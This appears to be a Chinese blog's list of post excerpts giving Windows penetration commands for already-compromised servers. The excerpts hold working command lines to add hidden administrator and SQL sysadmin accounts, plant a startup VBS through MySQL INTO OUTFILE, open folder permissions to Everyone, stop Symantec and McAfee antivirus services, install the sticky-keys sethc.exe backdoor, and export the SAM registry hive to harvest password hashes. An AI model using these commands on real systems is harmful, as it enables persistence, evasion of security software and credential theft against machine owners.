如果服务器中存在VPN,通过Dos命令执行操作 CMD 下操作 VPN方法: #允许administrator拨入该VPN: netsh ras set user administrator permit #禁止administrator拨入该VPN: netsh ras set user administrator deny #查看哪些用户可以拨入VPN: netsh ras show user #查看VPN分配IP的方式: netsh ras ip show config #使用地址池的方式分配IP: netsh ras ip set addrassign method = pool #地址池的范围是从192.168.3.1到192.168.3.254: netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
Author: 系统自定义
Cmd、Dos 命令行下添加 SQL 用户的方法
Cmd、Dos 命令行下添加 SQL 用户的方法: 需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下: exec master.dbo.sp_addlogin test,123 EXEC sp_addsrvrolemember ‘test, ‘sysadmin’ 然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry 另类的加用户方法: 在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下: js: var o=new ActiveXObject( “Shell.Users” ); z=o.create(“test”) ; z.changePassword(“123456″,””) z.setting(“AccountType”)=3; vbs: Set o=CreateObject( […]
Cmd 修改访问控制权限
Cmd 访问控制权限控制: 命令如下: cacls c: /e /t /g everyone:F #c盘everyone权限 cacls “目录” /d everyone #everyone不可读,包括admin 备注:反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
MySql添加管理员方法
MySql添加管理员,需重启: create table a (cmd text); insert into a values (“set wshshell=createobject (“”wscript.shell””)”); insert into a values (“a=wshshell.run (“”cmd.exe /c net user admin admin /add””,0)”); insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup administrators admin /add””,0)”); select * from a into outfile “C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs”;
各种杀软企业版本渗透处理办法
处理变态诺顿企业版: net stop “Symantec AntiVirus” /y net stop “Symantec AntiVirus Definition Watcher” /y net stop “Symantec Event Manager” /y net stop “System Event Notification” /y net stop “Symantec Settings Manager” /y 麦咖啡: net stop “McAfee McShield” Symantec病毒日志: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs Symantec病毒备份: C:\Documents and Settings\All U […]
添加windows后门方法
安装5次shift后门,沾滞键后门,替换SHIFT后门: 沾滞键后门: copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y 替换SHIFT后门: attrib c:\windows\system32\sethc.exe -h -r -s attrib c:\windows\system32\dllcache\sethc.exe -h -r -s del c:\windows\system32\ […]
windows-变相获取渗透机器的账号密码
Gethash 获取本机 hash: 首先导出注册表: Windows 2000:regedit /e d:\aa.reg “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” Windows 2003:reg export “HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users” d:\aa.reg 注意权限问题,一般注册表默认sam目录是不能访问的。 需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。 接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机, 然后用抓去hash的工具抓本地用户就OK了 hash 抓完了记得把自己的账户密码改过来! 当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。 然后… […]